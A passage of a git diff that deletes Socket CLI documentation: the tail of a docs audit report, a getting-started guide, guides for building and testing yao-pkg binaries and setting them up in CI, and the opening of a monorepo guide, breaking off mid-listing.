**Build Architecture Documentation** (2,014 lines → 1,300-1,500 lines) - - Effort: 4-5 hours - - Risk: Medium-High - core system documentation - - Saves: 500-700 lines - - Prerequisite: Team discussion on narrative structure - -2. **CLI Test Documentation** (2,171 lines → 1,500-1,600 lines) - - Effort: 3-4 hours - - Risk: Low - test documentation, less critical - - Saves: 571-671 lines - -#### Phase 4: Low-Impact Cleanup -**Better organization (no deletion):** -1. Platform binary package README unification -2. Add missing index files to package docs -3. Fix broken cross-references - -### Overall Consolidation Potential -- **Total lines saveable:** 2,000-3,100 lines (15-24% reduction) -- **Safer path:** 674-782 lines (5-6% reduction, minimal risk) -- **Realistic achievable:** 1,200-1,600 lines (9-12% reduction) - -### Quality Improvements (Non-Quantified) -- Clearer navigation (fewer files to choose from) -- Better consistency (single source of truth) -- Reduced maintenance burden -- Improved discoverability - ---- - -## DETAILED FINDINGS BY CATEGORY - -### Architecture Documentation -**Assessment:** Over-documented -- 2,014 lines across 4 files -- Significant overlap in explaining stub/bootstrap concepts -- Each file explains flow from different angle (redundant) -- **Recommendation:** Consolidate to 2 files (narrative + reference) - -### Build System Documentation -**Assessment:** Well-organized but verbose -- Good separation of concerns (quick-ref vs deep-dive) -- Node build docs (1,640 lines) could be condensed -- Good cross-referencing between files -- **Recommendation:** Consolidate Node.js docs, keep others - -### Configuration Documentation -**Assessment:** Confusing structure -- 3 files, unclear which to read first -- `summary` vs `architecture` distinction unclear -- Migration guide mixed in -- **Recommendation:** Single coherent guide, 2 files max - -### Development Documentation -**Assessment:** Good -- Covers key topics (getting started, babel, platform 
support) -- Appropriate length -- **Recommendation:** Keep as-is - -### Performance Documentation -**Assessment:** Redundant -- 1,345 lines repeating same principles 3 times -- Could be 40-50% shorter -- **Recommendation:** Consolidate to single comprehensive guide - -### Technical Documentation -**Assessment:** Mostly good, has deprecated file -- `.cacache-format-DEPRECATED.md` should be deleted -- Metadata and patch-cacache docs are current -- Manifest docs are well-maintained -- **Recommendation:** Delete deprecated file, keep others - -### Testing Documentation -**Assessment:** Under-indexed but excessive detail -- No clear entry point -- 2,171 lines for CLI tests alone -- Examples and patterns mixed together -- **Recommendation:** Better organization + consolidation - ---- - -## FINAL RECOMMENDATIONS - -### Immediate Actions (Do This Week) -1. **Delete** `/docs/technical/.cacache-format-DEPRECATED.md` -2. **Move** `/packages/cli/.claude/python-dlx-refactor-plan.md` to GitHub Issue #xxx -3. **Fix** broken reference to `build-toolchain-setup.md` in `docs/build/README.md` - -### Short Term (This Sprint) -1. Consolidate performance documentation (save 500+ lines) -2. Consolidate configuration documentation (save 200+ lines) -3. Add missing README indexes to package docs (yoga-layout/research, etc.) - -### Medium Term (Next Sprint) -1. Consolidate Node.js build documentation -2. Improve test documentation organization -3. 
Consolidate build architecture documentation (requires team discussion) - -### Metrics to Track -- Total documentation lines (target: <10,000) -- Number of .md files (target: <80 across project) -- Average file size (target: <150 lines for most files) -- Cross-reference validity (target: 100%) - ---- - -## APPENDIX: FILE ORGANIZATION STRUCTURE - -### Current State -``` -docs/ (412 KB, 12,862 lines) -├── README.md (index) -├── documentation-organization.md (3-tier guide) -├── architecture/ -│ ├── bootstrap-stub.md (650 lines) -│ ├── repository.md (537 lines) -│ ├── stub-execution.md (438 lines) -│ ├── stub-package.md (389 lines) -│ └── unified-binary.md -├── build/ (8 files, 1,640 lines dedicated to Node) -├── configuration/ (3 files, unclear structure) -├── development/ (4 files) -├── guides/ (2 files) -├── performance/ (3 files, 1,345 lines, high redundancy) -├── technical/ (5 files, 1 deprecated) -└── testing/ (3 files) -``` - -### Proposed Future State -``` -docs/ (estimate: 9,000-10,500 lines, 25-30% reduction) -├── README.md (index) -├── documentation-organization.md (3-tier guide) -├── architecture/ -│ ├── stub-system-overview.md (900-1,000 lines - consolidated) -│ └── stub-deep-dive.md (400-500 lines - consolidated) -├── build/ -│ ├── README.md -│ ├── build-dist-structure.md -│ ├── caching-strategy.md -│ ├── node-build-system.md (1,000-1,200 lines - consolidated) -│ ├── node-build-quick-reference.md (keep) -│ └── wasm-build-guide.md -├── configuration/ -│ ├── configuration-guide.md (600-700 lines - consolidated) -│ └── [migration subsection] -├── development/ (unchanged) -├── guides/ (unchanged) -├── performance/ -│ └── performance-optimization-guide.md (700-850 lines - consolidated) -├── technical/ -│ ├── manifest-management.md -│ ├── manifest-extensions.md -│ ├── metadata-files.md -│ └── patch-cacache.md -└── testing/ (slightly reorganized) -``` - ---- - -END OF AUDIT REPORT diff --git a/docs/getting-started.md b/docs/getting-started.md deleted file mode 
100644 index 6c3440ea6..000000000 --- a/docs/getting-started.md +++ /dev/null @@ -1,323 +0,0 @@ -# Getting Started - -**Quick start guide** — Get started with Socket CLI development in 10 minutes. - ---- - -## 📋 Prerequisites - -``` -Required: - ✓ Node.js 20+ (LTS recommended) - ✓ pnpm 9+ - ✓ Git - ✓ Socket.dev API key - -Optional (for binary builds): - ✓ Python 3.11+ (for SEA builds) - ✓ Docker (for cross-platform builds) -``` - ---- - -## 🚀 Quick Start - -### 1. Clone & Setup - -```bash -# Clone -git clone https://github.com/SocketDev/socket-cli.git -cd socket-cli - -# Install & verify -pnpm install -pnpm test -``` - -**This is a monorepo** with multiple packages! - ---- - -### 2. Monorepo Structure - -``` -socket-cli/ -├── packages/ -│ ├── cli/ # Main CLI package (@socketsecurity/cli) -│ │ ├── src/ -│ │ │ ├── commands/ # CLI commands (scan, install, etc.) -│ │ │ ├── utils/ # Utilities -│ │ │ └── index.mts # Entry point -│ │ └── test/ -│ │ -│ ├── bootstrap/ # CLI bootstrapper -│ ├── cli-with-sentry/ # Sentry integration -│ ├── socket/ # Published npm package wrapper -│ ├── node-sea-builder/ # Single Executable Application builder -│ ├── node-smol-builder/ # Optimized Node.js binary builder -│ └── sbom-generator/ # SBOM generation utilities -│ -├── scripts/ # Build and dev scripts -├── docs/ # Extensive documentation -│ ├── architecture/ # System architecture -│ ├── build/ # Build system docs -│ ├── development/ # Developer guides -│ ├── node-smol-builder/ # Binary optimization -│ └── ... -│ -└── pnpm-workspace.yaml # Monorepo configuration -``` - ---- - -### 3. 
Essential Commands - -```bash -# Development -pnpm run dev # Watch mode (all packages) -pnpm build # Build all packages - -# Testing -pnpm test # Run all tests -pnpm test:unit # Unit tests only -pnpm test:integration # Integration tests -pnpm run cover:all # Coverage for all packages - -# Working with specific packages -pnpm --filter @socketsecurity/cli test # Test CLI package only -pnpm --filter socket build # Build socket package only - -# Quality -pnpm run check # Type check + lint all packages -pnpm run lint # Lint all packages -pnpm run fix # Auto-fix issues - -# Binary builds (advanced) -pnpm run build:sea # Build Single Executable Application -pnpm run build:smol # Build optimized Node.js binary -``` - ---- - -## 🎯 Key Packages - -### @socketsecurity/cli (packages/cli/) - -**The main CLI implementation** - -- All CLI commands (`socket scan`, `socket install`, etc.) -- Interactive console features -- Package manager integrations (npm, pnpm, yarn, bun) - -### socket (packages/socket/) - -**Published npm package** - -- Wraps @socketsecurity/cli -- Handles installation and updates -- The package users actually `npm install -g socket` - -### node-smol-builder (packages/node-smol-builder/) - -**Optimized Node.js binary builder** - -- Creates ~35MB Node.js binaries (vs 60MB+ standard) -- V8 Lite mode, ICU removal, SEA removal -- Custom patches for Windows, macOS, Linux - -See [docs/node-smol-builder/](./node-smol-builder/) for details. - ---- - -## 💡 Development Workflow - -### Making Changes to CLI - -``` -1. Branch → git checkout -b feature/my-change -2. Navigate → cd packages/cli -3. Implement → Edit src/commands/ or src/utils/ -4. Test → pnpm test (in packages/cli/) -5. Verify → pnpm run fix && pnpm test (from root) -6. Commit → Conventional commits -7. 
PR → Submit pull request -``` - -### Adding New Commands - -```typescript -// packages/cli/src/commands/my-command/index.mts -export async function handleMyCommand(argv, ctx) { - // Command implementation -} - -// packages/cli/src/commands/my-command/cli.mts -export const cliConfig = { - command: 'my-command', - description: 'Does something awesome', - // ... command configuration -} -``` - -See [docs/development/](./development/) for detailed patterns. - ---- - -## 🔑 API Key Setup - -```bash -# .env file -SOCKET_SECURITY_API_KEY=your-api-key-here - -# Or configure via CLI -socket config set apiKey your-api-key-here -``` - -Get your API key at [socket.dev/settings/api-keys](https://socket.dev/settings/api-keys) - ---- - -## 📚 Key Concepts - -### 1. Monorepo Workflow - -Use pnpm workspaces for package management: - -```bash -# Run command in specific package -pnpm --filter @socketsecurity/cli test - -# Run command in all packages -pnpm -r test -``` - -### 2. Package Manager Integrations - -CLI supports npm, pnpm, yarn, and bun: - -```typescript -import { detectPackageManager } from '@socketsecurity/cli/utils/pm' - -const pm = await detectPackageManager(cwd) -// 'npm' | 'pnpm' | 'yarn' | 'bun' -``` - -### 3. Interactive Console - -Built with Ink (React for CLI): - -```typescript -// packages/cli/src/commands/console/InteractiveConsoleApp.tsx -import { Text, Box } from 'ink' - -export function InteractiveConsoleApp() { - return ( - - Interactive console - - ) -} -``` - -### 4. Binary Distribution - -The CLI can be distributed as: -- npm package (standard) -- Single Executable Application (SEA) -- Optimized Node.js binary (smol) - -Each has different build processes. See [docs/build/](./build/). 
- ---- - -## 🧪 Testing - -### Unit Tests - -```bash -# All unit tests -pnpm test:unit - -# Specific package -pnpm --filter @socketsecurity/cli test:unit -``` - -### Integration Tests - -```bash -# All integration tests (requires API key) -pnpm test:integration - -# Specific test file -pnpm test test/integration/commands/scan.test.mts -``` - -### Coverage - -```bash -# Coverage for all packages -pnpm run cover:all - -# Coverage for CLI package only -pnpm --filter @socketsecurity/cli run test:unit:coverage -``` - ---- - -## 📖 Documentation Structure - -Socket CLI has **extensive documentation**: - -``` -docs/ -├── architecture/ # System design, bootstrap flow -├── build/ # Build processes, WASM, patches -├── configuration/ # Config management -├── development/ # Setup, linking, platform support -├── node-smol-builder/ # Binary optimization details -├── sbom-generator/ # SBOM generation -├── testing/ # Test strategies -└── yoga-layout/ # Terminal layout engine -``` - -**Start with:** -1. [docs/development/getting-started.md](./development/getting-started.md) - Dev setup -2. [docs/architecture/](./architecture/) - How it all works -3. [docs/build/](./build/) - Build system deep dive - ---- - -## 🆘 Getting Help - -- **Issues:** [GitHub Issues](https://github.com/SocketDev/socket-cli/issues) -- **Discussions:** Ask in PR comments -- **Standards:** [CLAUDE.md](../CLAUDE.md) for conventions -- **Docs:** Extensive docs in [docs/](.) - ---- - -## ✅ Checklist - -- [ ] Installed dependencies (`pnpm install` from root) -- [ ] Tests passing (`pnpm test`) -- [ ] Set up API key -- [ ] Read [docs/development/getting-started.md](./development/getting-started.md) -- [ ] Understand monorepo structure -- [ ] Know pnpm workspace commands -- [ ] Understand commit format (conventional commits) -- [ ] Explored [docs/](.) for relevant guides -- [ ] Ready to contribute! 
- -**Welcome to Socket CLI!** 🎉 - ---- - -## 🚀 Advanced Topics - -Once you're comfortable with basics: - -- **Binary Builds:** [docs/build/](./build/) - SEA and smol builds -- **Node Patches:** [docs/node-smol-builder/patches.md](./node-smol-builder/patches.md) -- **Performance:** [docs/node-smol-builder/performance.md](./node-smol-builder/performance.md) -- **WASM Integration:** [docs/build/wasm-integration.md](./build/wasm-integration.md) -- **NLP Features:** [docs/cli/nlp-context-optimization.md](./cli/nlp-context-optimization.md) diff --git a/docs/guides/testing-yao-pkg.md b/docs/guides/testing-yao-pkg.md deleted file mode 100644 index 844b6b2fb..000000000 --- a/docs/guides/testing-yao-pkg.md +++ /dev/null @@ -1,278 +0,0 @@ -# Testing yao-pkg Binary Against Unit Tests - -This guide explains how to build and test the yao-pkg binary locally. - -## Prerequisites - -- macOS (for building Mac binaries) -- Xcode Command Line Tools: `xcode-select --install` -- Build tools: gcc, g++, make, python3 -- ~20GB free disk space for Node.js build -- 30-60 minutes for initial Node.js build - -## Quick Start (If Node Binary Already Built) - -If you already have `.custom-node-build/node-yao-pkg/out/Release/node`: - -```bash -# 1. Install dependencies -pnpm install - -# 2. Build CLI distribution -pnpm run build - -# 3. Build yao-pkg binary -pnpm exec pkg . - -# 4. Enable binary testing in .env.test -# Uncomment this line: -SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -# 5. Run tests -pnpm test -``` - -## Full Build From Scratch - -### Step 1: Install Dependencies - -```bash -pnpm install -``` - -This installs `@yao-pkg/pkg@6.8.0` and all other dependencies. - -### Step 2: Build CLI Distribution - -```bash -pnpm run build -``` - -This creates `dist/cli.js` which yao-pkg will bundle. 
- -**Output:** -- `dist/cli.js` - Main CLI entry (bundled, ~10-15MB) - -### Step 3: Build Custom Node Binary (One-Time, ~30-60 min) - -```bash -node scripts/build-yao-pkg-node.mjs -``` - -This downloads Node.js v24.9.0 source, applies yao-pkg patches, and builds the custom Node binary. - -**Output:** -- `.custom-node-build/node-yao-pkg/out/Release/node` (~83MB) -- Total build artifacts: ~19-20GB - -**Note:** This is a one-time build. Once built, you can reuse it for all future yao-pkg builds. - -### Step 4: Build yao-pkg Binary - -```bash -pnpm exec pkg . -``` - -This uses `pkg.json` configuration to: -1. Read `dist/cli.js` entry point -2. Use custom Node from `.custom-node-build/node-yao-pkg/out/Release/node` -3. Bundle as V8 bytecode -4. Embed assets in virtual filesystem -5. Create standalone executable - -**Output:** -- `pkg-binaries/socket-macos-arm64` (~90-110MB) - -**Time:** ~30 seconds - -### Step 5: Configure Tests to Use Binary - -Edit `.env.test` and uncomment the `SOCKET_CLI_BIN_PATH` line: - -```bash -# Before: -# SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -# After: -SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" -``` - -**What this does:** -- Tests will use `constants.binCliPath` which reads from `SOCKET_CLI_BIN_PATH` -- Instead of running `bin/cli.js`, tests run the yao-pkg binary -- The binary uses `SOCKET_CLI_JS_PATH="./dist/cli.js"` for local code (not downloading from npm) - -### Step 6: Run Tests - -```bash -pnpm test -``` - -Tests will now run against the yao-pkg binary instead of the Node.js script. - -## Testing Workflow Summary - -```bash -# One-time setup (if Node binary doesn't exist) -node scripts/build-yao-pkg-node.mjs # 30-60 min - -# Regular workflow -pnpm run build # Build dist/cli.js -pnpm exec pkg . 
# Build yao-pkg binary -# Uncomment SOCKET_CLI_BIN_PATH in .env.test -pnpm test # Run tests -``` - -## Environment Variables - -### SOCKET_CLI_JS_PATH - -**Purpose:** Points to local @socketsecurity/cli JS dist -**Default:** `./dist/cli.js` -**Used by:** Stub binaries (SEA, yao-pkg) to load local code instead of downloading from npm -**Location:** `.env.test` (always enabled) - -### SOCKET_CLI_BIN_PATH - -**Purpose:** Points to built binary to test -**Default:** Commented out (tests use `bin/cli.js`) -**Options:** -- `./pkg-binaries/socket-macos-arm64` - yao-pkg binary -- `./dist/sea/socket-macos-arm64` - SEA binary - -**Used by:** `constants.binCliPath` getter, which is passed to `spawnSocketCli()` in tests -**Location:** `.env.test` (commented out by default) - -**How it works:** -1. Tests call `spawnSocketCli(constants.binCliPath, args)` -2. `constants.binCliPath` reads from `SOCKET_CLI_BIN_PATH` env var (if set) -3. `spawnSocketCli()` detects if path is a JS file or binary: - - **JS files** (`.js`, `.mjs`, `.cjs`): Runs `node ` - - **Binaries** (no extension): Executes ` ` directly - -## File Locations - -``` -socket-cli/ -├── bin/cli.js # Thin wrapper (development) -├── dist/cli.js # Bundled CLI code (rollup output) -├── pkg-binaries/socket-macos-arm64 # yao-pkg binary (testing target) -├── .custom-node-build/ -│ └── node-yao-pkg/out/Release/node # Custom Node binary -├── .env.test # Test configuration -│ ├── SOCKET_CLI_JS_PATH="./dist/cli.js" # Always enabled -│ └── SOCKET_CLI_BIN_PATH=... 
# Commented out by default -└── test/**/*.test.mts # Unit tests -``` - -## Switching Between Test Modes - -### Test Against Development CLI (Default) - -```bash -# In .env.test, comment out SOCKET_CLI_BIN_PATH: -# SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -pnpm test -``` - -Tests use `bin/cli.js` → `dist/cli.js` - -### Test Against yao-pkg Binary - -```bash -# In .env.test, uncomment SOCKET_CLI_BIN_PATH: -SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -pnpm test -``` - -Tests use `pkg-binaries/socket-macos-arm64` directly - -### Test Against SEA Binary - -```bash -# In .env.test, use SEA path: -SOCKET_CLI_BIN_PATH="./dist/sea/socket-macos-arm64" - -pnpm test -``` - -Tests use `dist/sea/socket-macos-arm64` directly - -## Troubleshooting - -### "Cannot find module 'dist/cli.js'" - -**Solution:** Build the CLI first: -```bash -pnpm run build -``` - -### "Custom Node binary not found" - -**Error:** `pkg.json` references `.custom-node-build/node-yao-pkg/out/Release/node` but it doesn't exist. - -**Solution:** Build the custom Node binary: -```bash -node scripts/build-yao-pkg-node.mjs -``` - -### "pkg-binaries/socket-macos-arm64: No such file" - -**Solution:** Build the yao-pkg binary: -```bash -pnpm exec pkg . 
-``` - -### Tests fail with yao-pkg binary - -**Debug:** -```bash -# Test the binary directly -./pkg-binaries/socket-macos-arm64 --version - -# Check if it's loading local dist -# Should NOT download from npm -./pkg-binaries/socket-macos-arm64 --help -``` - -### Binary is too large (>200MB) - -**Expected size:** 90-110MB - -**Possible cause:** Debug symbols included - -**Solution:** Ensure custom Node was built with optimizations (build-yao-pkg-node.mjs handles this automatically) - -## CI/CD Integration - -For GitHub Actions, cache the custom Node binary to avoid rebuilding: - -```yaml -- name: Cache custom Node binary - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg - key: node-yao-pkg-v24.9.0-${{ runner.os }}-${{ runner.arch }} - -- name: Build custom Node if not cached - if: steps.cache-node.outputs.cache-hit != 'true' - run: node scripts/build-yao-pkg-node.mjs - -- name: Build yao-pkg binary - run: | - pnpm run build - pnpm exec pkg . - -- name: Test yao-pkg binary - env: - SOCKET_CLI_BIN_PATH: ./pkg-binaries/socket-macos-arm64 - run: pnpm test -``` - -## See Also - -- [YAO_PKG_BUILD.md](./YAO_PKG_BUILD.md) - Complete yao-pkg build documentation -- [REPOSITORY_STRUCTURE.md](./REPOSITORY_STRUCTURE.md) - Directory structure and build artifacts -- [PKG_PLATFORM_SUPPORT.md](./PKG_PLATFORM_SUPPORT.md) - Platform-specific considerations diff --git a/docs/guides/yao-pkg-ci.md b/docs/guides/yao-pkg-ci.md deleted file mode 100644 index 94bfbc30b..000000000 --- a/docs/guides/yao-pkg-ci.md +++ /dev/null @@ -1,483 +0,0 @@ -# CI Setup for yao-pkg Binary Builds - -This document covers setting up Continuous Integration (CI) for building Socket CLI yao-pkg binaries across multiple platforms. - -## Overview - -Building yao-pkg binaries in CI requires: -1. **Platform-specific runners** (macOS, Linux, Windows) -2. **Build tools** (compilers, make, python) -3. **UPX** (optional, for compression on Linux/Windows) -4. 
**Node.js** v22+ (for building Socket CLI) -5. **pnpm** v9+ -6. **~10GB disk space** per platform -7. **30-60 minutes** build time per platform - -## GitHub Actions Setup - -### Matrix Strategy - -Use a matrix strategy to build for multiple platforms: - -```yaml -name: Build yao-pkg Binaries - -on: - push: - branches: [main] - release: - types: [created] - -jobs: - build-node: - name: Build Custom Node.js - runs-on: ${{ matrix.os }} - strategy: - matrix: - include: - - os: macos-13 - target: macos-arm64 - node_arch: arm64 - - os: macos-13 - target: macos-x64 - node_arch: x64 - - os: ubuntu-latest - target: linux-x64 - node_arch: x64 - - os: ubuntu-latest - target: linux-arm64 - node_arch: arm64 - - os: windows-latest - target: win-x64 - node_arch: x64 - - steps: - - name: Checkout code - uses: actions/checkout@v4 - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version: '22' - - - name: Install pnpm - uses: pnpm/action-setup@v2 - with: - version: 9 - - - name: Install dependencies - run: pnpm install --frozen-lockfile - - - name: Install build tools (Linux) - if: runner.os == 'Linux' - run: | - sudo apt-get update - sudo apt-get install -y build-essential python3 upx-ucl - - - name: Install build tools (macOS) - if: runner.os == 'macOS' - run: | - # Xcode Command Line Tools are pre-installed - # UPX not needed on macOS (code signing incompatible) - echo "Build tools ready" - - - name: Install build tools (Windows) - if: runner.os == 'Windows' - run: | - choco install upx -y - - - name: Build custom Node.js - run: pnpm run build:yao-pkg:node - env: - TARGET_ARCH: ${{ matrix.node_arch }} - - - name: Upload Node.js binary - uses: actions/upload-artifact@v4 - with: - name: node-${{ matrix.target }} - path: .custom-node-build/node-yao-pkg/out/Release/node - retention-days: 7 - - build-cli: - name: Build CLI Binary - needs: build-node - runs-on: ${{ matrix.os }} - strategy: - matrix: - include: - - os: macos-13 - target: macos-arm64 - - os: macos-13 
- target: macos-x64 - - os: ubuntu-latest - target: linux-x64 - - os: ubuntu-latest - target: linux-arm64 - - os: windows-latest - target: win-x64 - - steps: - - name: Checkout code - uses: actions/checkout@v4 - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version: '22' - - - name: Install pnpm - uses: pnpm/action-setup@v2 - with: - version: 9 - - - name: Install dependencies - run: pnpm install --frozen-lockfile - - - name: Download Node.js binary - uses: actions/download-artifact@v4 - with: - name: node-${{ matrix.target }} - path: .custom-node-build/node-yao-pkg/out/Release/ - - - name: Build CLI distribution - run: pnpm run build:cli - - - name: Build pkg binary - run: pnpm run build:yao-pkg - - - name: Upload CLI binary - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.target }} - path: pkg-binaries/socket-* - retention-days: 30 -``` - -## Platform-Specific Setup - -### macOS - -**Pre-installed on GitHub Actions:** -- ✅ Xcode Command Line Tools -- ✅ Build essentials (clang, make, python3) - -**Additional setup:** -```bash -# No additional setup needed -# UPX is not used on macOS (incompatible with code signing) -``` - -**Notes:** -- Ad-hoc code signing is automatic in build script -- For distribution, use Developer ID certificate via secrets - -### Linux (Ubuntu/Debian) - -**Install build tools:** -```bash -sudo apt-get update -sudo apt-get install -y \ - build-essential \ - python3 \ - python3-pip \ - upx-ucl -``` - -**Notes:** -- `build-essential` includes gcc, g++, make -- `upx-ucl` is the official UPX package -- UPX will compress binary by ~30-50% - -### Linux (RHEL/Fedora/CentOS) - -**Install build tools:** -```bash -sudo dnf install -y \ - gcc \ - gcc-c++ \ - make \ - python3 \ - upx -``` - -### Windows - -**Install build tools via Chocolatey:** -```powershell -choco install -y visualstudio2022buildtools -choco install -y upx -``` - -**Or use WSL2 (recommended):** -```bash -# Use Ubuntu setup from above -wsl 
--install -d Ubuntu -``` - -**Notes:** -- Visual Studio Build Tools required for node-gyp -- UPX provides ~30-50% compression -- WSL2 is recommended for consistent builds - -## UPX Compression - -### What is UPX? - -UPX (Ultimate Packer for eXecutables) is a free executable compressor that: -- Reduces binary size by 30-50% (typical) -- Decompresses automatically at runtime (~50ms overhead) -- Works on Linux, Windows (not used on macOS due to code signing) - -### Installation by Platform - -**Ubuntu/Debian:** -```bash -sudo apt-get install upx-ucl -``` - -**RHEL/Fedora/CentOS:** -```bash -sudo dnf install upx -``` - -**macOS (not recommended):** -```bash -# UPX is available but incompatible with code signing -# brew install upx -``` - -**Windows:** -```powershell -choco install upx -``` - -**Manual installation:** -- Download from: https://upx.github.io/ -- Extract to PATH or `/usr/local/bin` - -### Verifying UPX Installation - -```bash -upx --version -# Output: upx 4.2.1 - -which upx -# Output: /usr/bin/upx (or similar) -``` - -### Build Script Behavior - -The `scripts/build-yao-pkg-node.mjs` script: -- ✅ **Attempts UPX** on Linux/Windows -- ✅ **Skips gracefully** if UPX not found -- ✅ **Never fails** the build -- ✅ **Logs warning** if UPX unavailable - -```javascript -if (!IS_MACOS) { - try { - await exec('upx', ['--best', '--lzma', nodeBinary]) - console.log('✅ UPX compression complete') - } catch (error) { - console.log('⚠️ UPX not available, skipping compression') - } -} -``` - -### Expected Binary Sizes - -| Platform | Unoptimized | Stripped | UPX Compressed | -|----------|-------------|----------|----------------| -| macOS ARM64 | ~95MB | ~44MB | N/A (code signed) | -| macOS x64 | ~95MB | ~44MB | N/A (code signed) | -| Linux x64 | ~95MB | ~44MB | ~22-31MB | -| Linux ARM64 | ~95MB | ~44MB | ~22-31MB | -| Windows x64 | ~95MB | ~44MB | ~22-31MB | - -## Caching Strategies - -### Cache Node.js Source - -Cache the Node.js source to avoid re-downloading: - -```yaml 
-- name: Cache Node.js source - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg - key: node-source-v24.10.0-${{ runner.os }}-${{ runner.arch }} -``` - -### Cache Node.js Build - -Cache the compiled Node.js binary to avoid rebuilding: - -```yaml -- name: Cache Node.js build - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg/out/Release/node - key: node-binary-v24.10.0-${{ runner.os }}-${{ runner.arch }}-${{ hashFiles('scripts/build-yao-pkg-node.mjs') }} -``` - -### Cache pnpm Store - -Cache pnpm dependencies: - -```yaml -- name: Get pnpm store directory - shell: bash - run: echo "STORE_PATH=$(pnpm store path --silent)" >> $GITHUB_ENV - -- name: Cache pnpm store - uses: actions/cache@v4 - with: - path: ${{ env.STORE_PATH }} - key: pnpm-${{ runner.os }}-${{ hashFiles('pnpm-lock.yaml') }} - restore-keys: | - pnpm-${{ runner.os }}- -``` - -## Storage and Distribution - -### Artifact Upload - -Upload binaries as artifacts: - -```yaml -- name: Upload binary - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.target }} - path: pkg-binaries/socket-* - retention-days: 30 -``` - -### Release Assets - -Attach binaries to GitHub releases: - -```yaml -- name: Upload to release - if: github.event_name == 'release' - uses: actions/upload-release-asset@v1 - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - with: - upload_url: ${{ github.event.release.upload_url }} - asset_path: ./pkg-binaries/socket-${{ matrix.target }} - asset_name: socket-${{ matrix.target }} - asset_content_type: application/octet-stream -``` - -## Environment Variables - -### Build Configuration - -```bash -# Target architecture (for cross-compilation) -export TARGET_ARCH=arm64 # or x64 - -# Skip UPX compression (for testing) -export SKIP_UPX=1 - -# PKG_EXECPATH (for testing patched Node.js) -export PKG_EXECPATH=PKG_INVOKE_NODEJS -``` - -### GitHub Secrets (Optional) - -For signed macOS releases: - -```yaml -env: - APPLE_CERTIFICATE_BASE64: ${{ 
secrets.APPLE_CERTIFICATE_BASE64 }} - APPLE_CERTIFICATE_PASSWORD: ${{ secrets.APPLE_CERTIFICATE_PASSWORD }} - APPLE_KEYCHAIN_PASSWORD: ${{ secrets.APPLE_KEYCHAIN_PASSWORD }} -``` - -## Troubleshooting - -### UPX Not Found - -**Symptom:** -``` -⚠️ UPX not available or failed, skipping compression -``` - -**Solution:** -- Install UPX via package manager (see above) -- Verify with `upx --version` -- Check PATH includes UPX location -- Build continues without compression (larger binary) - -### Node.js Build Timeout - -**Symptom:** -``` -Error: The operation was canceled. -``` - -**Solution:** -- Increase timeout in workflow: - ```yaml - timeout-minutes: 90 - ``` -- Use cached build artifacts -- Split build into separate jobs - -### Disk Space Issues - -**Symptom:** -``` -No space left on device -``` - -**Solution:** -- Clean up before build: - ```bash - df -h - sudo apt-get clean - docker system prune -af - ``` -- Use larger runner (GitHub Actions: `ubuntu-latest-8-cores`) - -### Code Signing Fails (macOS) - -**Symptom:** -``` -Error: codesign failed with exit code 1 -``` - -**Solution:** -- Verify Xcode Command Line Tools: `xcode-select --version` -- For ad-hoc signing, use `codesign --sign -` -- For distribution, provide valid certificate - -## Performance Tips - -1. **Parallel builds**: Build different platforms in parallel jobs -2. **Cache aggressively**: Cache Node.js source, build, and pnpm store -3. **Artifact compression**: GitHub automatically compresses artifacts -4. **Matrix strategy**: Use `fail-fast: false` to continue other builds if one fails -5. 
**Separate jobs**: Split Node.js build and pkg build into separate jobs - -## Cost Optimization - -For self-hosted runners: -- **Reuse runners**: Keep runners warm between builds -- **Local cache**: Persistent cache for Node.js source/builds -- **Incremental builds**: Only rebuild when patches change - -For GitHub Actions: -- **Cache everything**: Reduces build time and GitHub Actions minutes -- **On-demand builds**: Only build on release tags -- **Manual triggers**: Use `workflow_dispatch` for testing - -## References - -- [UPX Official Site](https://upx.github.io/) -- [GitHub Actions: actions/upload-artifact](https://github.com/actions/upload-artifact) -- [GitHub Actions: actions/cache](https://github.com/actions/cache) -- [yao-pkg Documentation](https://github.com/yao-pkg/pkg) -- Socket CLI: `docs/YAO_PKG_BUILD.md` diff --git a/docs/monorepo.md b/docs/monorepo.md deleted file mode 100644 index e0ef6bd5c..000000000 --- a/docs/monorepo.md +++ /dev/null @@ -1,71 +0,0 @@ -# Socket CLI Monorepo Guide - -This document explains the monorepo structure and how the different packages relate to each other. - -## Package Overview - -### Three Release Builds - -Socket CLI releases three distinct npm packages: - -1. **`@socketsecurity/cli`** - Full JavaScript CLI implementation -2. **`@socketsecurity/cli-with-sentry`** - Full JavaScript CLI with Sentry telemetry -3. 
**`socket`** - Thin wrapper that downloads `@socketsecurity/cli` on demand - -### Platform Binary Packages (8 total) - -Optional platform-specific native binaries: - -- `@socketbin/cli-darwin-arm64` - macOS Apple Silicon -- `@socketbin/cli-darwin-x64` - macOS Intel -- `@socketbin/cli-linux-arm64` - Linux ARM64 (glibc) -- `@socketbin/cli-linux-x64` - Linux x64 (glibc) -- `@socketbin/cli-alpine-arm64` - Alpine Linux ARM64 (musl) -- `@socketbin/cli-alpine-x64` - Alpine Linux x64 (musl) -- `@socketbin/cli-win32-arm64` - Windows ARM64 -- `@socketbin/cli-win32-x64` - Windows x64 - -### Private Build Tools (2 total) - -- `@socketbin/node-smol-builder-builder` - Builds custom Node.js from source with Socket patches -- `@socketbin/node-sea-builder-builder` - Builds Socket CLI as native Node.js SEA binaries (fallback) - -## Directory Structure - -``` -socket-cli/ -├── packages/ -│ ├── cli/ # @socketsecurity/cli -│ │ ├── src/ # CLI source code -│ │ ├── bin/ # CLI entry points -│ │ ├── test/ # Tests -│ │ ├── data/ # Static data -│ │ └── package.json -│ │ -│ ├── socket/ # socket (thin wrapper) -│ │ ├── bin/ -│ │ │ ├── socket.js # Entry point -│ │ │ └── bootstrap.js # Bootstrap logic -│ │ └── 